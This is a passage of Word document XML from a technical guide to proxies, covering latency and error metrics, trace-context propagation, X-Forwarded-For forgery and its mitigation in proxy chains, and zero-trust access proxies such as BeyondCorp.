    <w:p w14:paraId="47F9FE8E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="581"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>upstream_response_time: Time from request sent to last response byte received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA759F0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B32298D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="582"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>4xx_rate: Client errors (bad requests, auth failures). High rate → client bugs or attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E70C622" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="582"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>5xx_rate: Server errors. High rate → backend failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E043A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="582"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>upstream_connection_failure_rate: Failed connections to backends → health check mismatches, network issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A52B44" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="582"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>circuit_breaker_open_count: How many backends are currently circuit-broken open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2579B5D5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resource metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494175F5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>active_connections: Current active connections (client-facing + backend-facing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F572014" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>connection_pool_utilization: % of pool capacity in use per backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C768491" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>queue_depth: Requests queued waiting for a backend connection (high → backends overloaded).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C89EB1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>worker_thread_utilization (for threaded proxies): % of worker threads busy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507CDB6B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distributed Tracing Propagation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA8005" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The proxy sits at every service boundary — the ideal place to propagate trace context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050E2C17" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Incoming request with trace context:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBE33E4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD97AE3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>traceparent: 00-4bf92f3577b34da6a3ce929d0e0e4736-00f067aa0ba902b7-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244C0DC4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>tracestate: vendor=value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B8CDA1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The proxy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B56086" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="584"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reads the traceparent header (W3C TraceContext format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1944AFA7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="584"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>child span</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> representing the proxy's processing of this request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B134B44" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="584"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Records: request received timestamp, backend selected, connection pool wait time, upstream latency, response code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3B7959" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="584"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Propagates the trace context to the backend (with the span ID updated to the proxy's span ID — backend's spans become children of the proxy's span).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAB18BC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="584"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Exports the span to the tracing system (Jaeger, Zipkin, Tempo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E0B020" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Without proxy-level tracing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The trace shows: Client → Backend (one span). You cannot see how much time was spent in the proxy vs the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D18E92" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With proxy-level tracing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The trace shows: Client → Proxy (proxy processing span, including connection pool wait) → Backend (backend processing span). You can isolate proxy-introduced latency from backend processing time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405753CD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="1C326B98">
          <v:rect id="_x0000_i3062" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7136B45D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Proxy Chaining and the Trust Hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB24C45" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-Hop Proxy Architectures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0524CFE8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>In enterprise and security-sensitive environments, traffic flows through </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multiple proxies in sequence</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7048ACC7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1942A8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">Client → Corporate Forward Proxy → Egress Security Proxy → Internet → </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771F0450" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>CDN Reverse Proxy → WAF Reverse Proxy → API Gateway → Backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF576BB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each proxy in the chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D8E5F0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="585"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Terminates the previous connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F9E15C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="585"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Makes its own routing/policy decisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E475099" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="585"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Initiates the next connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EBF70B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="585"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Optionally adds metadata headers about what it observed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47712568" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The IP trust problem in chains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB4DA66" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The backend receives the request from the API gateway's IP. The WAF sees the CDN's IP as the client. Without explicit IP propagation (X-Forwarded-For, PROXY Protocol), every proxy sees only the previous hop's IP — not the original client's IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B702A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The X-Forwarded-For trust model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087AF7CB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7080D5E0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client (1.2.3.4) → Proxy A (10.0.0.1) → Proxy B (10.0.0.2) → Backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1999D5E2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="3DAEFAF8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>X-Forwarded-For: 1.2.3.4, 10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDEDAF3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Proxy A adds X-Forwarded-For: 1.2.3.4 (the client's IP). Proxy B appends , 10.0.0.1 (Proxy A's IP). Backend receives the header with both IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C829AD6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The forgery problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A malicious client can send:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097AAF47" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A2FEB9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>X-Forwarded-For: 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0212E770" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Proxy A prepends the real client IP: X-Forwarded-For: 8.8.8.8, 1.2.3.4 (client's real IP is rightmost). But a naive backend reading the leftmost IP gets 8.8.8.8 (forged).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A455A34" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The correct reading strategy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Trust only the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rightmost N IPs</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>, where N is the number of trusted proxies in your chain. If you have 2 trusted proxies (Proxy A, Proxy B), trust only the 2 rightmost IPs in X-Forwarded-For. The rightmost IP added by a trusted proxy is the actual previous hop's IP. Work backwards to find the real client IP at position total_ips - N.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A23E4E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cloudflare's approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Cloudflare sets CF-Connecting-IP header with the real client IP — added by Cloudflare itself (a trusted proxy the customer doesn't control). They also set X-Forwarded-For but advise using CF-Connecting-IP as authoritative. The backend must be configured to trust that the CF-Connecting-IP header genuinely comes from Cloudflare (validate against Cloudflare's IP ranges to prevent clients forging it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D16C6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zero-Trust Proxy Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9F54A4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Traditional network security assumes everything inside the network perimeter is trusted. </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zero-trust</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> assumes nothing is trusted by default — every connection must be authenticated and authorized regardless of network location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7EDF96" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The proxy's role in zero-trust:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47544653" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The proxy enforces zero-trust policies at every request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071AA6E9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="586"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identity verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Every request must carry a valid credential (JWT, mTLS certificate). No credential = rejected, regardless of source network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2481FA6F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="586"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authorization per request:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Each request is checked against authorization policies: "Can user X perform action Y on resource Z?" — not just "is the user authenticated?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29713A3C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="586"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Device posture:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The client device must meet security requirements (patched OS, disk encryption, MDM enrollment). Device posture is verified at proxy ingress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D3D554" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="586"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continuous verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Sessions are not trusted indefinitely. Short token TTLs (minutes to hours) force re-authentication. Any anomaly (unusual geographic location, unusual access time) triggers re-authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ABE6F0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BeyondCorp (Google's zero-trust model):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C73C90" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>All corporate applications are behind a reverse proxy (Access Proxy) accessible from any network — no VPN, no network perimeter. Authentication is per-user + per-device. The Access Proxy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736B1CB4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Validates the user's identity (SSO token).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F390EAA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Validates the device's posture certificate (issued by fleet management to compliant devices).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF47189" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Checks the user's authorization to access the specific application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB496A0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Forwards the request with user and device metadata to the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4103235C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="587"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The backend trusts only requests through the Access Proxy — any direct connection is rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307052D8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>This model eliminates the network perimeter as a security concept. An employee on a coffee shop WiFi has the same access as one in the headquarters — because access is controlled at the proxy layer based on identity and device posture, not network location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6026FAD0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="55565C04">
          <v:rect id="_x0000_i3063" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5270EF4E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519952D6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
